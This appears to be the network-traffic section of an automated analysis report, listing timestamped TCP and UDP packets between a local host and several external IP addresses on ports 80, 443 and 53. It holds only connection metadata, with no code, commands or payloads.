Nov 21, 2024 12:20:20.211343050 CET	443	49748	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:20.211399078 CET	49748	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:20.211837053 CET	49748	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:20.216088057 CET	49741	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:20.217299938 CET	49749	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:20.335922956 CET	80	49741	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:20.335999012 CET	49741	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:20.336894035 CET	80	49749	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:20.336976051 CET	49749	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:20.337147951 CET	49749	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:20.421189070 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:20.423805952 CET	49751	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:20.423846960 CET	443	49751	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:20.424002886 CET	49751	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:20.424294949 CET	49751	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:20.424316883 CET	443	49751	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:20.456554890 CET	80	49749	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:20.467891932 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:21.602137089 CET	80	49749	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:21.603560925 CET	49756	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:21.603671074 CET	443	49756	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:21.603744984 CET	49756	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:21.603985071 CET	49756	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:21.604017973 CET	443	49756	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:21.655388117 CET	49749	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:21.680197001 CET	443	49751	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:21.681899071 CET	49751	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:21.681981087 CET	443	49751	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:22.137804985 CET	443	49751	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:22.137872934 CET	443	49751	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:22.137947083 CET	49751	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:22.138534069 CET	49751	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:22.142821074 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:22.144041061 CET	49757	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:22.262939930 CET	80	49740	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:22.263012886 CET	49740	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:22.263629913 CET	80	49757	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:22.263715982 CET	49757	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:22.263870001 CET	49757	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:22.383282900 CET	80	49757	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:22.911690950 CET	443	49756	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:22.914627075 CET	49756	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:22.914649010 CET	443	49756	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:23.376188993 CET	443	49756	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:23.376351118 CET	443	49756	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:23.376439095 CET	49756	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:23.376818895 CET	49756	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:23.383860111 CET	49763	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:23.503413916 CET	80	49763	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:23.503545046 CET	49763	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:23.503763914 CET	49763	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:23.575783014 CET	80	49757	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:23.577660084 CET	49764	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:23.577692986 CET	443	49764	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:23.577760935 CET	49764	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:23.578181982 CET	49764	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:23.578197956 CET	443	49764	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:23.623296976 CET	80	49763	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:23.624113083 CET	49757	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:24.868138075 CET	80	49763	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:24.869455099 CET	49767	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:24.869520903 CET	443	49767	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:24.869646072 CET	49767	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:24.869919062 CET	49767	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:24.869950056 CET	443	49767	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:24.881969929 CET	443	49764	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:24.883905888 CET	49764	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:24.883949041 CET	443	49764	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:24.920995951 CET	49763	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:25.348499060 CET	443	49764	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:25.348582029 CET	443	49764	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:25.348701954 CET	49764	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:25.349097013 CET	49764	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:25.353625059 CET	49773	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:25.473109007 CET	80	49773	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:25.473195076 CET	49773	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:25.473340034 CET	49773	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:25.592745066 CET	80	49773	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:26.173074961 CET	443	49767	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:26.175149918 CET	49767	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:26.175194025 CET	443	49767	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:26.637793064 CET	443	49767	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:26.637865067 CET	443	49767	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:26.638124943 CET	49767	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:26.638736963 CET	49767	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:26.644541025 CET	49763	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:26.645740986 CET	49774	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:26.764964104 CET	80	49763	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:26.765093088 CET	49763	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:26.765561104 CET	80	49774	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:26.765681028 CET	49774	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:26.765824080 CET	49774	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:26.785577059 CET	80	49773	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:26.786720991 CET	49775	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:26.786761045 CET	443	49775	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:26.786844969 CET	49775	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:26.787163019 CET	49775	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:26.787177086 CET	443	49775	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:26.827264071 CET	49773	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:26.885962009 CET	80	49774	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:28.048743963 CET	443	49775	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:28.060342073 CET	49775	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:28.060363054 CET	443	49775	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:28.079519033 CET	80	49774	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:28.080919981 CET	49781	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:28.081007004 CET	443	49781	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:28.081149101 CET	49781	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:28.081408024 CET	49781	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:28.081424952 CET	443	49781	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:28.124278069 CET	49774	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:28.506900072 CET	443	49775	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:28.506968975 CET	443	49775	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:28.507033110 CET	49775	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:28.507550001 CET	49775	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:28.510942936 CET	49773	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:28.512090921 CET	49782	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:28.630884886 CET	80	49773	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:28.631045103 CET	49773	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:28.631577015 CET	80	49782	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:28.631654978 CET	49782	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:28.631906986 CET	49782	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:28.751388073 CET	80	49782	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:29.349385023 CET	443	49781	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:29.351088047 CET	49781	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:29.351181030 CET	443	49781	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:29.804963112 CET	443	49781	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:29.805032015 CET	443	49781	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:29.805140972 CET	49781	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:29.805684090 CET	49781	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:29.809246063 CET	49774	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:29.810368061 CET	49788	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:29.929081917 CET	80	49774	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:29.929198027 CET	49774	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:29.929934025 CET	80	49788	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:29.930027008 CET	49788	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:29.930200100 CET	49788	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:29.944485903 CET	80	49782	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:29.945827007 CET	49789	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:29.945863962 CET	443	49789	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:29.945983887 CET	49789	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:29.946239948 CET	49789	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:29.946257114 CET	443	49789	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:29.999131918 CET	49782	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:30.049616098 CET	80	49788	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:31.204444885 CET	443	49789	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:31.223344088 CET	49789	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:31.223361015 CET	443	49789	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:31.662317991 CET	443	49789	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:31.662391901 CET	443	49789	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:31.662460089 CET	49789	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:31.662933111 CET	49789	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:31.666132927 CET	49782	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:31.667054892 CET	49790	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:31.786014080 CET	80	49782	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:31.786075115 CET	49782	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:31.786604881 CET	80	49790	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:31.786684990 CET	49790	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:31.786822081 CET	49790	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:31.907022953 CET	80	49790	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:32.242924929 CET	80	49788	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:32.244446993 CET	49796	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:32.244498968 CET	443	49796	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:32.244646072 CET	49796	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:32.244914055 CET	49796	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:32.244946957 CET	443	49796	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:32.296241045 CET	49788	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:33.099962950 CET	80	49790	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:33.101521015 CET	49797	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:33.101571083 CET	443	49797	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:33.101648092 CET	49797	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:33.101979971 CET	49797	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:33.101994038 CET	443	49797	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:33.139780998 CET	49790	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:33.501154900 CET	443	49796	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:33.502758980 CET	49796	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:33.502866030 CET	443	49796	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:33.954797029 CET	443	49796	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:33.954866886 CET	443	49796	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:33.954917908 CET	49796	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:33.963746071 CET	49796	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:34.031352997 CET	49788	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.032624006 CET	49798	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.151442051 CET	80	49788	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:34.151504040 CET	49788	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.152839899 CET	80	49798	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:34.152923107 CET	49798	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.153079033 CET	49798	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.272499084 CET	80	49798	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:34.387063026 CET	443	49797	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:34.389481068 CET	49797	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:34.389506102 CET	443	49797	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:34.843410969 CET	443	49797	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:34.843544006 CET	443	49797	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:34.843599081 CET	49797	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:34.844504118 CET	49797	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:34.848212957 CET	49790	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.849580050 CET	49804	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.968107939 CET	80	49790	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:34.968214035 CET	49790	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.969074011 CET	80	49804	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:34.969175100 CET	49804	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:34.969331980 CET	49804	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:35.088911057 CET	80	49804	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:35.511667013 CET	80	49798	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:35.513026953 CET	49805	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:35.513127089 CET	443	49805	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:35.513217926 CET	49805	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:35.513483047 CET	49805	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:35.513519049 CET	443	49805	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:35.561762094 CET	49798	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:36.235622883 CET	80	49804	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:36.236864090 CET	49806	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:36.236897945 CET	443	49806	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:36.236973047 CET	49806	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:36.237256050 CET	49806	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:36.237268925 CET	443	49806	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:36.280421972 CET	49804	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:36.769639015 CET	443	49805	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:36.771716118 CET	49805	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:36.771745920 CET	443	49805	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:37.226386070 CET	443	49805	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:37.226485014 CET	443	49805	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:37.226623058 CET	49805	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:37.227082968 CET	49805	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:37.230446100 CET	49798	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:37.231698036 CET	49812	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:37.350840092 CET	80	49798	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:37.350950003 CET	49798	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:37.351306915 CET	80	49812	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:37.351413965 CET	49812	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:37.351619959 CET	49812	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:37.471515894 CET	80	49812	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:37.495534897 CET	443	49806	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:37.497291088 CET	49806	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:37.497337103 CET	443	49806	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:37.955615997 CET	443	49806	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:37.955703020 CET	443	49806	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:37.955799103 CET	49806	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:37.956273079 CET	49806	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:37.959647894 CET	49804	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:37.960839987 CET	49813	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:38.080041885 CET	80	49804	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:38.080144882 CET	49804	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:38.080768108 CET	80	49813	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:38.080856085 CET	49813	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:38.081000090 CET	49813	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:38.200578928 CET	80	49813	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:38.664212942 CET	80	49812	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:38.666286945 CET	49814	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:38.666327953 CET	443	49814	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:38.666436911 CET	49814	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:38.666692972 CET	49814	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:38.666709900 CET	443	49814	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:38.718044996 CET	49812	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:39.397109032 CET	80	49813	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:39.398504019 CET	49820	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:39.398551941 CET	443	49820	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:39.398633003 CET	49820	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:39.398897886 CET	49820	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:39.398916006 CET	443	49820	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:39.452352047 CET	49813	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:39.923865080 CET	443	49814	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:39.925700903 CET	49814	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:39.925740004 CET	443	49814	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:40.381586075 CET	443	49814	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:40.381656885 CET	443	49814	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:40.381771088 CET	49814	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:40.382234097 CET	49814	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:40.397278070 CET	49812	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:40.517172098 CET	80	49812	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:40.517328024 CET	49812	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:40.627599001 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:40.627649069 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:40.627720118 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:40.628180981 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:40.628197908 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:40.657130003 CET	443	49820	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:40.659044981 CET	49820	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:40.659073114 CET	443	49820	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:41.111274004 CET	443	49820	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:41.111392975 CET	443	49820	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:41.111443996 CET	49820	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:41.111855030 CET	49820	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:41.115151882 CET	49813	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:41.116132975 CET	49827	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:41.234961987 CET	80	49813	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:41.235075951 CET	49813	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:41.235531092 CET	80	49827	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:41.235614061 CET	49827	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:41.235826015 CET	49827	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:41.355400085 CET	80	49827	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:42.039668083 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:42.039823055 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:42.041709900 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:42.041739941 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:42.042028904 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:42.043752909 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:42.091322899 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:42.501355886 CET	80	49827	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:42.502841949 CET	49828	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:42.502922058 CET	443	49828	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:42.503021955 CET	49828	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:42.503369093 CET	49828	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:42.503403902 CET	443	49828	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:42.546000004 CET	49827	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:42.552185059 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:42.552254915 CET	443	49821	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:42.552309036 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:42.557749033 CET	49821	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:43.763618946 CET	443	49828	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:43.765973091 CET	49828	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:43.766016006 CET	443	49828	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:44.227545023 CET	443	49828	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:44.227618933 CET	443	49828	188.114.97.3	192.168.2.9
Nov 21, 2024 12:20:44.227679014 CET	49828	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:44.229742050 CET	49828	443	192.168.2.9	188.114.97.3
Nov 21, 2024 12:20:44.256720066 CET	49827	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:44.257936954 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:44.257973909 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:44.258039951 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:44.258568048 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:44.258586884 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:44.376524925 CET	80	49827	193.122.6.168	192.168.2.9
Nov 21, 2024 12:20:44.376630068 CET	49827	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:45.915817022 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:45.915893078 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:45.917879105 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:45.917908907 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:45.918159008 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:45.919850111 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:45.967333078 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:46.442492962 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:46.442590952 CET	443	49834	149.154.167.220	192.168.2.9
Nov 21, 2024 12:20:46.442838907 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:46.446089029 CET	49834	443	192.168.2.9	149.154.167.220
Nov 21, 2024 12:20:47.795598984 CET	49749	80	192.168.2.9	193.122.6.168
Nov 21, 2024 12:20:51.645735025 CET	49757	80	192.168.2.9	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 12:20:10.580370903 CET	52856	53	192.168.2.9	1.1.1.1
Nov 21, 2024 12:20:10.806102037 CET	53	52856	1.1.1.1	192.168.2.9
Nov 21, 2024 12:20:12.831824064 CET	52719	53	192.168.2.9	1.1.1.1
